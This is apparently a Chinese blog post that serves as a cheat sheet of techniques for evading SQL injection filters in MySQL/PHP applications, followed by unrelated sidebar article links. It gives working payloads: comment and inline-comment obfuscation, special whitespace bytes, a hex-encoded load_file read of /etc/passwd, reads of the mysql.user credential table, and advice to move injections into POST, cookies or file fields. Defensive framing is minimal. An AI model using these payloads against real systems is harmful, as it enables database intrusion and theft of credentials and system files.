mysql注入绕过的一些技巧
2024-09-13 11:12:21
虽然mysql + php的开发中可以使用pdo中,但是有些老久的程序没有使用,或其他原因
1.注释绕过
select/*comment*/user/*zzsdsdsf*/from mysql.user;
2.内联注释绕过
/*!12345select*//*!12345user*/ from mysql.user;
3.特殊空白字符绕过
在php中\s会匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20
但是在mysql中空白字符为 0x09,0x0a,0x0b,0x0c,0x0d,0x20,0xa0
0xa0有时候有奇效
0x0a和0x0d会影响"."的匹配,有时候也是可以利用的
4.十六进制绕过
select load_file('0x2f6574632f706173737764');
python
>>> '/etc/passwd'.encode('hex')
'2f6574632f706173737764'
5.换一种提交姿势绕过
有时候程序员只过滤了GET中的危险字符,可以试试POST,COOKIES甚至是FILES
6.mysql黑魔法绕过
select{x user}from {x mysql.user};
select user from mysql.user where 1=\Nunion select@1;
select user from mysql.user where 1=\Nunion select-.1;
最新文章
- 玩转Windows服务系列汇总
- windows下python的web环境搭建使用(观看Backbone的教程有感)
- 1、启动oracle的步骤
- SQLServer子查询
- ODAC(V9.5.15) 学习笔记(十九)主键值自动生成
- [小技巧] git: Your branch and 'origin/master' have diverged
- eclips引入Java源代码
- JBoss像tomcat那样创建部署文件,JBoss创建虚拟目录
- AIX filesystemcache引发的Oracle事故
- log4j 和slf4j的比较
- Leetcode 136.只出现一次的数字 By Python
- 【转】/bin/bash^M: bad interpreter: No such file or directory
- jenkins+mail邮件配置
- python基础知识~备份还原功能设计
- 【Android】android:windowSoftInputMode属性详解
- 判断是手机请求还是pc请求
- c#mvc实现登录
- Node 编码规范(优秀是一种习惯)
- 使用 Chef 自动执行 Azure 虚拟机部署
- Could not find a package configuration file provided by ";ecl_build";,.................couldn't find required component 'ecl_build'
热门文章
- 自定义View(二)ViewPage广告轮播
- HDU1358:Period
- Developers, do consider different user roles! - A bad experience with cron
- sql获取时间时分秒
- 标识域 Identify Field
- Qt 5 在Windows下 出现QApplication: No such file or directory 问题的解决办法
- android ListView_新闻案例
- Codevs 1014 装箱问题
- opencv 手写选择题阅卷 (二)字符识别
- defrag磁盘整理命令